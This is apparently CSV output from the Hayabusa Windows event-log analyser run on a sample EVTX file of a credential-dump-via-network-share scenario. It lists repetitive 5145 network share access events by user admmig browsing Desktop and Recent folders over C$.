0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.484 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.505 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.523 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.542 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.558 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 
20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via 
network share.evtx 2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.641 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials 
from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
